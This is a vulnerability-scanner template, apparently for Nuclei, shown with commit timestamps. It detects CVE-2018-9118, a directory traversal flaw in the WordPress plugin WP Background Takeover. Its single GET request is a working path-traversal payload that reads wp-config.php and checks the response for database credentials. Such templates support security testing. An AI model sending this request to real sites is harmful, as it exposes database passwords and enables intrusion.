2021-07-15 12:11:16 +00:00
id : CVE-2018-9118
2021-07-15 09:59:40 +00:00
info :
name : WP Background Takeover, Directory Traversal <= 4.1.4
author : 0x_Akoko
severity : high
description : Affected by this vulnerability is an unknown functionality of the file exports/download.php. The manipulation of the argument filename with the input value leads to a directory traversal vulnerability
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/44417
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-9118
cwe-id : CWE-22
2022-04-22 10:38:41 +00:00
tags : wordpress,wp-plugin,lfi,cve,cve2018,traversal
2021-07-15 09:59:40 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php'
matchers-condition : and
matchers :
- type : word
words :
- "DB_NAME"
- "DB_PASSWORD"
2021-07-15 12:10:37 +00:00
- "DB_HOST"
- "The base configurations of the WordPress"
2021-07-15 09:59:40 +00:00
part : body
condition : and